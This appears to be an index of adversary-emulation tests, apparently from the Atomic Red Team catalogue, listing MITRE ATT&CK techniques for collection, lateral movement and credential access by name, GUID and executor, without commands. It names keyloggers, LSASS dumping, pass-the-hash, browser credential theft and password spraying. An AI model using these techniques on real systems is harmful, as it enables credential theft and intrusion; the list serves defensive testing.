1095 collection T1560.001 Archive Collected Data: Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
1096 collection T1560.001 Archive Collected Data: Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
1097 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
1098 collection T1560.001 Archive Collected Data: Archive via Utility 9 Encrypts collected data with AES-256 and Base64 a743e3a6-e8b2-4a30-abe7-ca85d201b5d3 bash
1099 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
1100 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
1101 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
1102 collection T1113 Screen Capture 4 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
1103 collection T1113 Screen Capture 5 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
1104 collection T1113 Screen Capture 6 Windows Screen Capture (CopyFromScreen) e9313014-985a-48ef-80d9-cde604ffc187 powershell
1105 collection T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
1106 collection T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
1107 collection T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
1108 collection T1056.001 Input Capture: Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
1109 collection T1056.001 Input Capture: Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
1110 collection T1056.001 Input Capture: Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
1111 collection T1056.001 Input Capture: Keylogging 7 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
1112 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
1113 collection T1123 Audio Capture 2 Registry artefact when application use microphone 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a command_prompt
1114 collection T1123 Audio Capture 3 using Quicktime Player c7a0bb71-70ce-4a53-b115-881f241b795b sh
1115 collection T1074.001 Data Staged: Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
1116 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
1117 collection T1074.001 Data Staged: Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
1118 collection T1114.001 Email Collection: Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
1119 collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
1120 collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
1121 collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
1122 collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
1123 collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
1124 collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
1125 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
1126 collection T1115 Clipboard Data 4 Collect Clipboard Data via VBA 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 powershell
1127 collection T1115 Clipboard Data 5 Add or copy content to clipboard with xClip ee363e53-b083-4230-aff3-f8d955f2d5bb sh
1128 collection T1530 Data from Cloud Storage Object 1 Azure - Enumerate Azure Blobs with MicroBurst 3dab4bcc-667f-4459-aea7-4162dd2d6590 powershell
1129 collection T1530 Data from Cloud Storage Object 2 Azure - Scan for Anonymous Access to Azure Storage (Powershell) 146af1f1-b74e-4aa7-9895-505eb559b4b0 powershell
1130 collection T1530 Data from Cloud Storage Object 3 AWS - Scan for Anonymous Access to S3 979356b9-b588-4e49-bba4-c35517c484f5 sh
1131 collection T1560.002 Archive Collected Data: Archive via Library 1 Compressing data using GZip in Python (Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 bash
1132 collection T1560.002 Archive Collected Data: Archive via Library 2 Compressing data using bz2 in Python (Linux) c75612b2-9de0-4d7c-879c-10d7b077072d bash
1133 collection T1560.002 Archive Collected Data: Archive via Library 3 Compressing data using zipfile in Python (Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 bash
1134 collection T1560.002 Archive Collected Data: Archive via Library 4 Compressing data using tarfile in Python (Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db bash
1135 collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
1136 collection T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
1137 collection T1125 Video Capture 1 Registry artefact when application use webcam 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a command_prompt
1138 collection T1114.003 Email Collection: Email Forwarding Rule 1 Office365 - Email Forwarding 3234117e-151d-4254-9150-3d0bac41e38c powershell
1139 collection T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
1140 collection T1056.002 Input Capture: GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
1141 collection T1039 Data from Network Shared Drive 1 Copy a sensitive File over Administrative share with copy 6ed67921-1774-44ba-bac6-adb51ed60660 command_prompt
1142 collection T1039 Data from Network Shared Drive 2 Copy a sensitive File over Administrative share with Powershell 7762e120-5879-44ff-97f8-008b401b9a98 powershell
1143 collection T1056.004 Input Capture: Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
1144 lateral-movement T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
1145 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 1 Map admin share 3386975b-367a-4fbb-9d77-4dcf3639ffd3 command_prompt
1146 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
1147 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
1148 lateral-movement T1021.002 Remote Services: SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
1149 lateral-movement T1021.006 Remote Services: Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
1150 lateral-movement T1021.006 Remote Services: Windows Remote Management 2 Remote Code Execution with PS Credentials Using Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
1151 lateral-movement T1021.006 Remote Services: Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
1152 lateral-movement T1021.003 Remote Services: Distributed Component Object Model 1 PowerShell Lateral Movement using MMC20 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 powershell
1153 lateral-movement T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
1154 lateral-movement T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
1155 lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
1156 lateral-movement T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
1157 lateral-movement T1563.002 Remote Service Session Hijacking: RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
1158 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 1 Mimikatz Pass the Hash ec23cef9-27d9-46e4-a68d-6f75f7b86908 command_prompt
1159 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 2 crackmapexec Pass the Hash eb05b028-16c8-4ad8-adea-6f5b219da9a9 command_prompt
1160 lateral-movement T1550.002 Use Alternate Authentication Material: Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
1161 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 1 RDP to DomainController 355d4632-8cb9-449d-91ce-b566d0253d3e powershell
1162 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 2 Changing RDP Port to Non Standard Port via Powershell 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 powershell
1163 lateral-movement T1021.001 Remote Services: Remote Desktop Protocol 3 Changing RDP Port to Non Standard Port via Command_Prompt 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 command_prompt
1164 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
1165 credential-access T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
1166 credential-access T1056.001 Input Capture: Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
1167 credential-access T1056.001 Input Capture: Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
1168 credential-access T1056.001 Input Capture: Keylogging 3 Logging bash history to syslog 0e59d59d-3265-4d35-bebd-bf5c1ec40db5 sh
1169 credential-access T1056.001 Input Capture: Keylogging 4 Bash session based keylogger 7f85a946-a0ea-48aa-b6ac-8ff539278258 sh
1170 credential-access T1056.001 Input Capture: Keylogging 5 SSHD PAM keylogger 81d7d2ad-d644-4b6a-bea7-28ffe43becca sh
1171 credential-access T1056.001 Input Capture: Keylogging 6 Auditd keylogger a668edb9-334e-48eb-8c2e-5413a40867af sh
1172 credential-access T1056.001 Input Capture: Keylogging 7 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
1173 credential-access T1110.001 Brute Force: Password Guessing 1 Brute Force Credentials of single Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
1174 credential-access T1110.001 Brute Force: Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
1175 credential-access T1110.001 Brute Force: Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
1176 credential-access T1110.001 Brute Force: Password Guessing 4 Password Brute User using Kerbrute Tool 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 powershell
1177 credential-access T1110.001 Brute Force: Password Guessing 5 SUDO Brute Force - Debian ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 bash
1178 credential-access T1110.001 Brute Force: Password Guessing 6 SUDO Brute Force - Redhat 4097bc00-5eeb-4d56-aaf9-287d60351d95 bash
1179 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
1180 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
1181 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
1182 credential-access T1003 OS Credential Dumping 4 Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) 6c7a4fd3-5b0b-4b30-a93e-39411b25d889 powershell
1183 credential-access T1003 OS Credential Dumping 5 Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) 42510244-5019-48fa-a0e5-66c3b76e6049 powershell
1184 credential-access T1003 OS Credential Dumping 6 Dump Credential Manager using keymgr.dll and rundll32.exe 84113186-ed3c-4d0d-8a3c-8980c86c1f4a powershell
1185 credential-access T1539 Steal Web Session Cookie 1 Steal Firefox Cookies (Windows) 4b437357-f4e9-4c84-9fa6-9bcee6f826aa powershell
1186 credential-access T1539 Steal Web Session Cookie 2 Steal Chrome Cookies (Windows) 26a6b840-4943-4965-8df5-ef1f9a282440 powershell
1187 credential-access T1003.002 OS Credential Dumping: Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
1188 credential-access T1003.002 OS Credential Dumping: Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
1189 credential-access T1003.002 OS Credential Dumping: Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
1190 credential-access T1003.002 OS Credential Dumping: Security Account Manager 4 PowerDump Hashes and Usernames from Registry 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
1191 credential-access T1003.002 OS Credential Dumping: Security Account Manager 5 dump volume shadow copy hives with certutil eeb9751a-d598-42d3-b11c-c122d9c3f6c7 command_prompt
1192 credential-access T1003.002 OS Credential Dumping: Security Account Manager 6 dump volume shadow copy hives with System.IO.File 9d77fed7-05f8-476e-a81b-8ff0472c64d0 powershell
1193 credential-access T1003.002 OS Credential Dumping: Security Account Manager 7 WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb powershell
1194 credential-access T1552.005 Unsecured Credentials: Cloud Instance Metadata API 1 Azure - Search Azure AD User Attributes for Passwords ae9b2e3e-efa1-4483-86e2-fae529ab9fb6 powershell
1195 credential-access T1552.005 Unsecured Credentials: Cloud Instance Metadata API 2 Azure - Dump Azure Instance Metadata from Virtual Machines cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7 powershell
1196 credential-access T1110.002 Brute Force: Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
1197 credential-access T1555.001 Credentials from Password Stores: Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
1198 credential-access T1003.004 OS Credential Dumping: LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
1199 credential-access T1606.002 Forge Web Credentials: SAML token 1 Golden SAML b16a03bc-1089-4dcc-ad98-30fe8f3a2b31 powershell
1200 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
1201 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
1202 credential-access T1003.007 OS Credential Dumping: Proc Filesystem 3 Capture Passwords with MimiPenguin a27418de-bdce-4ebd-b655-38f04842bf0c bash
1203 credential-access T1040 Network Sniffing 1 Packet Capture Linux using tshark or tcpdump 7fe741f7-b265-4951-a7c7-320889083b3e bash
1204 credential-access T1040 Network Sniffing 2 Packet Capture macOS using tcpdump or tshark 9d04efee-eff5-4240-b8d2-07792b873608 bash
1205 credential-access T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
1206 credential-access T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
1207 credential-access T1040 Network Sniffing 5 Windows Internal pktmon capture c67ba807-f48b-446e-b955-e4928cd1bf91 command_prompt
1208 credential-access T1040 Network Sniffing 6 Windows Internal pktmon set filter 855fb8b4-b8ab-4785-ae77-09f5df7bff55 command_prompt
1209 credential-access T1040 Network Sniffing 7 Packet Capture macOS using /dev/bpfN with sudo e6fe5095-545d-4c8b-a0ae-e863914be3aa bash
1210 credential-access T1040 Network Sniffing 8 Filtered Packet Capture macOS using /dev/bpfN with sudo e2480aee-23f3-4f34-80ce-de221e27cd19 bash
1211 credential-access T1040 Network Sniffing 9 Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo 10c710c9-9104-4d5f-8829-5b65391e2a29 bash
1212 credential-access T1040 Network Sniffing 10 Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo 7a0895f0-84c1-4adf-8491-a21510b1d4c1 bash
1213 credential-access T1040 Network Sniffing 11 Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo 515575ab-d213-42b1-aa64-ef6a2dd4641b bash
1214 credential-access T1040 Network Sniffing 12 Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo b1cbdf8b-6078-48f5-a890-11ea19d7f8e9 bash
1215 credential-access T1552.002 Unsecured Credentials: Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
1216 credential-access T1552.002 Unsecured Credentials: Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
1217 credential-access T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
1218 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 1 Rubeus asreproast 615bd568-2859-41b5-9aed-61f6a88e48dd powershell
1219 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 2 Get-DomainUser with PowerView d6139549-7b72-4e48-9ea1-324fc9bdf88a powershell
1220 credential-access T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting 3 WinPwn - PowerSharpPack - Kerberoasting Using Rubeus 8c385f88-4d47-4c9a-814d-93d9deec8c71 powershell
1221 credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
1222 credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
1223 credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
1224 credential-access T1555 Credentials from Password Stores 4 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] 36753ded-e5c4-4eb5-bc3c-e8fba236878d powershell
1225 credential-access T1555 Credentials from Password Stores 5 Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] bc071188-459f-44d5-901a-f8f2625b2d2e powershell
1226 credential-access T1555 Credentials from Password Stores 6 WinPwn - Loot local Credentials - lazagne 079ee2e9-6f16-47ca-a635-14efcd994118 powershell
1227 credential-access T1555 Credentials from Password Stores 7 WinPwn - Loot local Credentials - Wifi Credentials afe369c2-b42e-447f-98a3-fb1f4e2b8552 powershell
1228 credential-access T1555 Credentials from Password Stores 8 WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords db965264-3117-4bad-b7b7-2523b7856b92 powershell
1229 credential-access T1552 Unsecured Credentials 1 AWS - Retrieve EC2 Password Data using stratus a21118de-b11e-4ebd-b655-42f11142df0c sh
1230 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
1231 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
1232 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
1233 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 4 Simulating access to Chrome Login Data 3d111226-d09a-4911-8715-fe11664f960d powershell
1234 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 5 Simulating access to Opera Login Data 28498c17-57e4-495a-b0be-cc1e36de408b powershell
1235 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 6 Simulating access to Windows Firefox Login Data eb8da98a-2e16-4551-b3dd-83de49baa14c powershell
1236 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 7 Simulating access to Windows Edge Login Data a6a5ec26-a2d1-4109-9d35-58b867689329 powershell
1237 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 8 Decrypt Mozilla Passwords with Firepwd.py dc9cd677-c70f-4df5-bd1c-f114af3c2381 powershell
1238 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 9 LaZagne.py - Dump Credentials from Firefox Browser 87e88698-621b-4c45-8a89-4eaebdeaabb1 sh
1239 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 10 Stage Popular Credential Files for Exfiltration f543635c-1705-42c3-b180-efd6dc6e7ee7 powershell
1240 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 11 WinPwn - BrowserPwn 764ea176-fb71-494c-90ea-72e9d85dce76 powershell
1241 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 12 WinPwn - Loot local Credentials - mimi-kittenz ec1d0b37-f659-4186-869f-31a554891611 powershell
1242 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 13 WinPwn - PowerSharpPack - Sharpweb for Browser Credentials e5e3d639-6ea8-4408-9ecd-d5a286268ca0 powershell
1243 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 14 Simulating Access to Chrome Login Data - MacOS 124e13e5-d8a1-4378-a6ee-a53cd0c7e369 sh
1244 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 15 WebBrowserPassView - Credentials from Browser e359627f-2d90-4320-ba5e-b0f878155bbe powershell
1245 credential-access T1555.003 Credentials from Password Stores: Credentials from Web Browsers 16 BrowserStealer (Chrome / Firefox / Microsoft Edge) 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd powershell
1246 credential-access T1552.004 Unsecured Credentials: Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
1247 credential-access T1552.004 Unsecured Credentials: Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
1248 credential-access T1552.004 Unsecured Credentials: Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
1249 credential-access T1552.004 Unsecured Credentials: Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
1250 credential-access T1552.004 Unsecured Credentials: Private Keys 5 Copy the users GnuPG directory with rsync 2a5a0601-f5fb-4e2e-aa09-73282ae6afca sh
1251 credential-access T1552.004 Unsecured Credentials: Private Keys 6 ADFS token signing and encryption certificates theft - Local 78e95057-d429-4e66-8f82-0f060c1ac96f powershell
1252 credential-access T1552.004 Unsecured Credentials: Private Keys 7 ADFS token signing and encryption certificates theft - Remote cab413d8-9e4a-4b8d-9b84-c985bd73a442 powershell
1253 credential-access T1552.004 Unsecured Credentials: Private Keys 8 CertUtil ExportPFX 336b25bf-4514-4684-8924-474974f28137 powershell
1254 credential-access T1552.004 Unsecured Credentials: Private Keys 9 Export Root Certificate with Export-PFXCertificate 7617f689-bbd8-44bc-adcd-6f8968897848 powershell
1255 credential-access T1552.004 Unsecured Credentials: Private Keys 10 Export Root Certificate with Export-Certificate 78b274f8-acb0-428b-b1f7-7b0d0e73330a powershell
1256 credential-access T1552.004 Unsecured Credentials: Private Keys 11 Export Certificates with Mimikatz 290df60e-4b5d-4a5e-b0c7-dc5348ea0c86 command_prompt
1257 credential-access T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay 1 LLMNR Poisoning with Inveigh (PowerShell) deecd55f-afe0-4a62-9fba-4d1ba2deb321 powershell
1258 credential-access T1003.001 OS Credential Dumping: LSASS Memory 1 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
1259 credential-access T1003.001 OS Credential Dumping: LSASS Memory 2 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
1260 credential-access T1003.001 OS Credential Dumping: LSASS Memory 3 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
1261 credential-access T1003.001 OS Credential Dumping: LSASS Memory 4 Dump LSASS.exe Memory using NanoDump dddd4aca-bbed-46f0-984d-e4c5971c51ea command_prompt
1262 credential-access T1003.001 OS Credential Dumping: LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
1263 credential-access T1003.001 OS Credential Dumping: LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
1264 credential-access T1003.001 OS Credential Dumping: LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
1265 credential-access T1003.001 OS Credential Dumping: LSASS Memory 8 Dump LSASS.exe Memory using Out-Minidump.ps1 6502c8f0-b775-4dbd-9193-1298f56b6781 powershell
1266 credential-access T1003.001 OS Credential Dumping: LSASS Memory 9 Create Mini Dump of LSASS.exe using ProcDump 7cede33f-0acd-44ef-9774-15511300b24b command_prompt
1267 credential-access T1003.001 OS Credential Dumping: LSASS Memory 10 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
1268 credential-access T1003.001 OS Credential Dumping: LSASS Memory 11 Dump LSASS with createdump.exe from .Net v5 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 powershell
1269 credential-access T1003.001 OS Credential Dumping: LSASS Memory 12 Dump LSASS.exe using imported Microsoft DLLs 86fc3f40-237f-4701-b155-81c01c48d697 powershell
1270 credential-access T1110.003 Brute Force: Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
1271 credential-access T1110.003 Brute Force: Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
1272 credential-access T1110.003 Brute Force: Password Spraying 3 Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) f14d956a-5b6e-4a93-847f-0c415142f07d powershell
1273 credential-access T1110.003 Brute Force: Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
1274 credential-access T1110.003 Brute Force: Password Spraying 5 WinPwn - DomainPasswordSpray Attacks 5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82 powershell
1275 credential-access T1110.003 Brute Force: Password Spraying 6 Password Spray Invoke-DomainPasswordSpray Light b15bc9a5-a4f3-4879-9304-ea0011ace63a powershell
1276 credential-access T1110.003 Brute Force: Password Spraying 7 Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) f3a10056-0160-4785-8744-d9bd7c12dc39 powershell
1277 credential-access T1110.003 Brute Force: Password Spraying 8 Password Spray using Kerbrute Tool c6f25ec3-6475-47a9-b75d-09ac593c5ecb powershell
1278 credential-access T1110.003 Brute Force: Password Spraying 9 AWS - Password Spray an AWS using GoAWSConsoleSpray 9c10d16b-20b1-403a-8e67-50ef7117ed4e sh
1279 credential-access T1003.005 OS Credential Dumping: Cached Domain Credentials 1 Cached Credential Dump via Cmdkey 56506854-89d6-46a3-9804-b7fde90791f9 command_prompt
1280 credential-access T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket 1 Crafting Active Directory golden tickets with mimikatz 9726592a-dabc-4d4d-81cd-44070008b3af powershell
1281 credential-access T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket 2 Crafting Active Directory golden tickets with Rubeus e42d33cd-205c-4acf-ab59-a9f38f6bad9c powershell
1282 credential-access T1649 Steal or Forge Authentication Certificates 1 Staging Local Certificates via Export-Certificate eb121494-82d1-4148-9e2b-e624e03fbf3d powershell
1283 credential-access T1552.003 Unsecured Credentials: Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
1284 credential-access T1552.001 Unsecured Credentials: Credentials In Files 1 Find AWS credentials 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17 sh
1285 credential-access T1552.001 Unsecured Credentials: Credentials In Files 2 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
1286 credential-access T1552.001 Unsecured Credentials: Credentials In Files 3 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
